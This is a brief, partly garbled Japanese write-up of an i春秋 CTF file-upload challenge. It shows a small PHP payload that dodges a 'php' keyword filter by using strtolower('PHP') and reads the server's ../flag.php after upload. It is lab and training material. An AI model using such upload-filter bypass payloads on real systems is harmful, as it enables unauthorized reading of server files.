i春秋CTF Upload

689 ワード

ぶんせき
  • は任意のファイルをアップロードすることができ、アップロード後にファイルを開くことができ(ソースコードにはリンク/u/xx.phpがある)、phpコードをアップロードしてflagを開くことを考えている.phpページ:
    php
    
    しかし , php :
  • を発見
    
    $fh=fopen("../flag.".strtolower("PHP"),'r');
    echo fread($fh,filesize("../flag.".strtolower("PHP"))); 
    fclose($fh);
    
    
  • ソースコードの表示:
  • echo 'here_is_flag';
    'flag{###}';